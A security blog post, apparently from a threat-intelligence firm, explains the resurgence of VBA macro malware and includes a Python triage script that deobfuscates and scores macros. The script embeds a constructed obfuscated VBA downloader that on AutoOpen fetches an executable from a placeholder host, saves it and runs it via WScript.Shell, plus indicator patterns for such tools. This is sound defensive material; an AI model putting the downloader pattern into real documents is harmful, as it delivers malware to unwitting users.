The evolution of macro malware

Those who pay attention to such things will know that macro malware, a staple of the late 90s and early 2000s, has made a major comeback over the past few years. Why and how are criminals using this tactic to compromise end-users?

A macro is fundamentally nothing more than a way of automating mundane or repetitive tasks. Using a macro language, users can create simple programs that group several distinct actions into a single command that executes them in sequence.

Back in the day, numerous viruses were written in Visual Basic for Applications (VBA), the macro language built into Microsoft Office. Macro viruses like Nuclear and Melissa were designed to replicate across every compatible document they could reach, editing data, deleting files and generally being a nuisance. They hooked the auto-executing entry points of the application (AutoOpen, Document_Open and friends), so at the time merely opening a compromised file would trigger the macro and spread the infection, which meant that such viruses were relatively easy to 'catch'.

Silobreaker’s Time Series tool showing recent malware associated with Microsoft Office.

Microsoft eventually took action by disabling macros by default, a security model it tightened over successive Office releases and formalised with the Trust Center and its "Enable Content" bar in Office 2007. Since then, macro viruses have more or less died out… until relatively recently.

Over the last two years we've witnessed a resurgence in this method of compromise, as malware authors realise that the most economical way of penetrating an organisation is via the average user. But the new versions of this malware don't tend to operate in the same way as their predecessors, and while less complex, they are far more dangerous. Today's macro viruses are trojan downloaders: short VBA routines that run when the document is opened, use the machine's internet connection to fetch a malicious payload from a site chosen by the malware's author, write it to disk and execute it. BlackEnergy, Locky and Dridex have all used this method of infection, to name but a few.

Of course, there are still a few hurdles for malware authors to overcome.

First off, macros are still disabled by default, which means that users have to open a malicious file and then click through the "Enable Content" prompt before the downloader can do its work. This is where social engineering comes into play.

An example of what a malicious document encouraging you to enable macros might look like.

Have you recently received an unreadable but important looking document telling you to enable macros? It’s almost certainly malicious. Fake invoices, CVs and purchase orders are routinely sent to companies all over the world, many of them containing a downloader for the ransomware du jour, or if you’re really unlucky, something far worse.

The second problem is that there usually needs to be a functioning internet connection for the payload to be downloaded. The odds are good that this will happen eventually, but what if it doesn't? What if a web proxy or firewall blocks the outbound request? It turns out that it's perfectly possible to embed the payload in the malicious document itself, for example as an encoded string inside the macro or as an embedded object, and have the macro decode it, write it to disk and execute it, rather than having to download anything at all.

Crunchcode is a commercial VBA obfuscator.

You may wonder where antivirus comes into play in all this. Well, reports on the preponderance of polymorphic malware already suggest that signature-based detection is well past its prime. Authors of macro malware usually take care to obfuscate their code, whether by padding it with redundant operations that confuse antivirus programs, or by encoding its strings (URLs, object names, commands) so that the macro's intent is essentially unreadable until it is decoded at runtime. The practical consequence for defenders is that looking for known strings in the raw macro text is not enough; the code has to be decoded, or its behaviour observed, before the indicators show up.
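To make the downloader pattern and the string obfuscation described above concrete, here is an added triage script (not code from the original post, and not Silobreaker's tooling). It embeds a constructed, deliberately non-functional-looking sample of an obfuscated VBA downloader, folds the Chr() concatenation and StrReverse() tricks back into plain strings, and counts indicator families before and after decoding. The indicator lists and the scoring rule are this example's own assumptions, not a published detection standard.

```python
import re

# Constructed sample of an obfuscated VBA trojan downloader, written for this
# example (not taken from any real campaign). The URL and COM object names are
# hidden behind Chr() concatenation and StrReverse so that a naive keyword scan
# of the raw source sees neither a URL nor "WScript.Shell".
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim u As String, p As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & StrReverse("exe.yap/moc.elpmaxe")
    p = Environ("TEMP") & "\upd.exe"
    Fetch u, p
    CreateObject(StrReverse("llehS.tpircSW")).Run p, 0
End Sub

Sub Fetch(u As String, p As String)
    Dim h As Object, s As Object
    Set h = CreateObject(StrReverse("PTTHLMX.2LMXSM"))
    h.Open "GET", u, False
    h.Send
    Set s = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(68) & Chr(66) & ".Stream")
    s.Type = 1
    s.Open
    s.Write h.responseBody
    s.SaveToFile p, 2
End Sub
'''

# Indicator families this example looks for (an assumed list, not a standard).
# VBA is case-insensitive, so every pattern is compiled with re.I. Counts rather
# than booleans, so the analyst can see noise versus capability.
INDICATORS = {
    "auto-exec": r"\b(?:AutoOpen|Auto_Open|AutoExec|Document_Open|Workbook_Open)\b",
    "object creation": r"\b(?:CreateObject|GetObject)\s*\(",
    "http download": r"MSXML2\.XMLHTTP|WinHttp|URLDownloadToFile|https?://",
    "file drop": r"ADODB\.Stream|\.SaveToFile\b|Open\s+\S+\s+For\s+Binary",
    "execution": r"WScript\.Shell|\bShell\b|\.Run\b|\.Exec\b|\bpowershell\b",
    "obfuscation": r"\bChr[BW]?\s*\(|\bStrReverse\s*\(|\bXor\b",
}
_COMPILED = {name: re.compile(pat, re.I) for name, pat in INDICATORS.items()}

# Three common string-hiding tricks, undone with regexes over the source text.
CHR_RUN = re.compile(r"Chr\s*\(\s*\d+\s*\)(?:\s*&\s*Chr\s*\(\s*\d+\s*\))*", re.I)
STRREVERSE = re.compile(r'StrReverse\s*\(\s*"([^"]*)"\s*\)', re.I)
LITERAL_CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
URL = re.compile(r"https?://[^\s\"']+", re.I)


def _decode_chr_run(m: re.Match) -> str:
    """Turn Chr(104) & Chr(105) into the VBA literal "hi" (embedded quotes doubled)."""
    chars = "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0)))
    return '"' + chars.replace('"', '""') + '"'


def deobfuscate(vba: str) -> str:
    """Repeatedly fold Chr() runs, StrReverse("...") and "a" & "b" until the text is stable."""
    prev, text = None, vba
    while text != prev:
        prev = text
        text = CHR_RUN.sub(_decode_chr_run, text)
        text = STRREVERSE.sub(lambda m: '"' + m.group(1)[::-1] + '"', text)
        text = LITERAL_CONCAT.sub(r'"\1\2"', text)
    return text


def scan(vba: str) -> dict:
    """Count hits per indicator family in one piece of VBA source."""
    return {name: sum(1 for _ in pat.finditer(vba)) for name, pat in _COMPILED.items()}


def verdict(counts: dict) -> str:
    """Auto-exec plus at least two payload-handling capabilities is the downloader shape."""
    payload = sum(1 for k in ("http download", "file drop", "execution") if counts[k])
    if counts["auto-exec"] and payload >= 2:
        return "suspicious"
    return "review" if counts["auto-exec"] or payload else "clean"


def triage(vba: str) -> dict:
    """Scan raw and decoded source; the second pass is what surfaces the real IOCs."""
    decoded = deobfuscate(vba)
    return {
        "raw": scan(vba),
        "deobfuscated": scan(decoded),
        "decoded": decoded,
        "urls": URL.findall(decoded),
        "verdict": verdict(scan(decoded)),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for stage in ("raw", "deobfuscated"):
        print(stage, result[stage])
    print("URLs:", result["urls"], "verdict:", result["verdict"])
```

Run as-is, the raw pass finds the auto-exec entry point and a handful of generic COM calls but no URL and no "http download" indicator at all; the decoded pass recovers http://example.com/pay.exe, MSXML2.XMLHTTP, ADODB.Stream and WScript.Shell. Real obfuscators add junk code, split strings across variables and use arithmetic on character codes, none of which this folding handles, which is exactly why sandbox execution or a proper VBA emulator is the usual next step rather than more regexes.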

The best defences, as always, are common sense and preparedness; don't open attachments that look suspicious or come from people you don't know, and never enable macros on a document just because it tells you to. Keep Office, your browser and your operating system patched. Where your Office version supports it, block macros in documents that arrived from the internet centrally via Group Policy, and disable them entirely for users who have no business need for them. Keep abreast of new macro malware campaigns and alert your employees when a new outbreak occurs, so they think twice before clicking.

The Silobreaker Team
